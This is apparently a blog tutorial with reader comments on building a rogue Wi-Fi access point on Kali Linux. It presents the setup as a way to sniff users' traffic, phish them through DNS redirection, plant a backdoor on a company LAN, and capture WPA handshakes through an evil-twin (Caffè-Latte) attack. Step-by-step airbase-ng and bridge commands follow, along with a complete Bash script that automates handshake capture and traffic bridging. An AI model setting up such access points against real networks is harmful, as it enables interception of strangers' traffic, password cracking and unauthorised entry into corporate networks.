Rougue Access Point using Kali Linux

A Rougue Access Point (RAP) is a fake wifi connection that can be used to sniff information.
Basically you have a PC (Kali Linux live in this case) with 2 interfaces: a wired one (eth0) connected to a working network and a wireless one (wlan0).
The wireless card will be configured as AccessPoint (AP) and a bridge will be created to link wired and wireless connections.
When a user connects to the new hot spot created, his data are bridged, through the PC, to the wired connection and proxed to the destination (internet).
I use for these operations airbase-ng command (aircrack-ng suite).

Some scenarios:
Sniffing traffic
I setup a RAP and start wireshark, ettercap or another network sniffer. Every connections that pass through my PC are intercepted.
Phishing
I setup a RAP and force it to use mine DNS Server. If someone will connects to me and start to surf I am able to redirect traffic using my DNS. In this case I can implement some kind of phishing.
Company network back door
I setup, may be using a small RaspberryPi, an access point using the Company network as wired interface. This is an hot spot directly connectet to the Company LAN.
Caffè-Latte attack
Locoking at the wireless packets you can see the client trying to connect to the previusly registred access point (eg. MY_NETWORK). I Can setup an access point using the same SID the client is searching for. When the client, that is serching for a known SSID, find my RAP named MY_NETKORK it immediatly try to connect. I can use this connection to sniff WPA handshakes or WEP packets and try to decode passwords.
Extend my connection
I have a notebook connected to a LAN but no access point. I also have a smartphone and I want a wireless connection on-the-fly.

The basic configuration:
– eth0, the wired connection linked to the network
– a DHCP server working on the LAN where eth0 is connected
– wlan0, a wireless interface able to be setted up in monitor mode

I start the monitor mode on wlan0:

root@kali:~# airmon-ng start wlan0

This will create the mon0 interface.
Now I setup an AP on mon0, named “MY_network”, channel 11 and WEP autentication. I can also set it as a free wifi without password (airbase-ng --help).

root@kali:~# airbase-ng --essid MY_network -c 11 -w abcdefabcdefabcdefabcdef12 mon0

This will create the at0 interface.
Now the AP is started, in another terminal window I make a bridge named rougue-bridge and link at0 to eth0 using the bridge-utils. Note that in Kali Linux the bridge-utils have to be installed (apt-get install bridge-utils) in order to use brctl command.

root@kali:~# brctl addbr test-bridge
root@kali:~# brctl addif test-bridge eth0
root@kali:~# brctl addif test-bridge at0

I can release the IPs of eth0 and at0. This is because the two interfaces are now integrated in the virtual bridge and don’t need an IP anymore:

root@kali:~# ifconfig eth0 down
root@kali:~# ifconfig eth0 0.0.0.0 up
root@kali:~# ifconfig at0 down
root@kali:~# ifconfig at0 0.0.0.0 up

I need also the IP forwarding:

root@kali:~# echo 1 > /proc/sys/net/ipv4/ip_forward

At the end I configure the test-bridge. Differently from eth0 and ap0 the bridge needs an IP of the LAN where eth0 is connected.

root@kali:~# ifconfig test-bridge 192.168.x.y netmask 255.255.255.0 broadcast 192.168.x.255 up
root@kali:~# route add default gw 192.168.x.1

Note that these are temporary operations that will be discarded by rebooting the system.

Extra
Starting an AP to sniffing handshake.

root@kali:~# airbase-ng -c 6 -e ESSID -z 2 -W 1 -F file.cap wlan0

-z sets WPA1 tags (2 = TKIP)
-W set WEP flag in beacons. The option -W 1 is recommended when using -z or -Z
-F where to store the cap file.

Here’s my old simple script to start a Rougue Access Point using Linux Bash. It may need some adjustment, but I think it will work.

#!/bin/sh
echo "---------------------------------------"
echo "Script per la creazione di un Rougue AP"
echo "---------------------------------------"
echo "Digita"
echo "  Per creare un Rougue AP per la cattura dell'handshake digita ----> 1"
echo "  Per creare un Rougue AP per condividere la connessione digita ---> 2"
read CHOSE1
if [ "${CHOSE1}" == "1" ]
then
#Inizio creazione AP per cattura handshake
echo
echo "Creazione AP per cattura handshake"
echo
echo "Quale essid vuoi utilizzare?"
read ESSID1
echo "Su quale canale vuoi che trasmetta (1-11)"
read CHAN1
echo "IL file con i pacchetti è salvato in /tmp/${ESSID1}.cap"
ifconfig wlan0 down
airmon-ng start wlan0
airbase-ng -c ${CHAN1} -e ${ESSID1} -z 2 -W 1 -F /tmp/${ESSID1}.cap wlan0
#Fine creazione AP per cattura handshake
read
elif [ "${CHOSE1}" == "2" ]
then
#Inizio creazione AP per condivisione connessione
echo
echo "Creazione AP per condivisione connessione"
echo
echo "Faccio partire la funzionalità di monitoring su wlan0"
ifconfig wlan0 down
airmon-ng start wlan0
echo "Creo un AP sull'interfaccia virtuale at0"
echo "Quale essid vuoi utilizzare?"
read ESSID
echo "Su quale canale vuoi che trasmetta (1-11)"
read CHAN
echo "Impostare una password? (y/n)"
read CHOSE2
    if [ "${CHOSE2}" == "y" ]
    then
    gnome-terminal --geometry 83x19 -x bash -c "
    echo "
La password è stata impostata di default WEP abcdefabcdefabcdefabcdef12"
    airbase-ng --essid ${ESSID} -c ${CHAN} -w abcdefabcdefabcdefabcdef12 mon0"
 
    else
    echo "La password non è stata impostata"  
    gnome-terminal --geometry 83x19 -x bash -c "
    airbase-ng --essid ${ESSID} -c ${CHAN} mon0"

    fi 
echo "Creo l'interfaccia br0 bridge vi ecollego eth0 e at0"
brctl addbr br0
brctl addif br0 eth0
brctl addif br0 at0
ifconfig eth0 down
ifconfig eth0 0.0.0.0 up
ifconfig at0 down
ifconfig at0 0.0.0.0 up
echo 1 > /proc/sys/net/ipv4/ip_forward
echo "Inserisci i dati per nuova interfaccia bridge creata"
echo -n "Indirizzo ip:"
read IP
echo -n "Netmask:"
read NETMASK
echo -n "Broadcast:"
read BROAD
echo -n "Gateway:"
read ROUTE
ifconfig br0 ${IP} netmask ${NETMASK} broadcast ${BROAD} up
route add default gw ${ROUTE}
#Fine creazione AP per condivisione connessione
read
else
echo "Scelta non corretta premere invio per uscire dal programma."
read
fi

4 Responses to Rougue Access Point using Kali Linux

  1. On March 18, 2014 at 16:09 i8ft5 said:

    I was able to set up an AP, thanks. I would be interested in how to undo the changes too.

  2. On March 18, 2014 at 17:59 Peru said:

    Every bridge, ip configuration or new virtual interface, created using the procedure described before, will be removed when you reboot the kali machine.

  3. On October 31, 2014 at 17:34 Hugo said:

    I can see the AP when I run the `airbase-ng` command, but as soon as I enter the `brctl addif test-bridge at0` command it disappears. Even after completing all the steps it wont show up anymore. (Other devices and when using airodump-ng mon0)

  4. On December 5, 2016 at 20:30 gopi said:

    a DHCP server working on the LAN where eth0 is connected..
    How to do this??? what does it mean..
    im using NAT in virtualbox and latest kali version..
    dhcp server is my problem…

Leave a Reply

Your email address will not be published.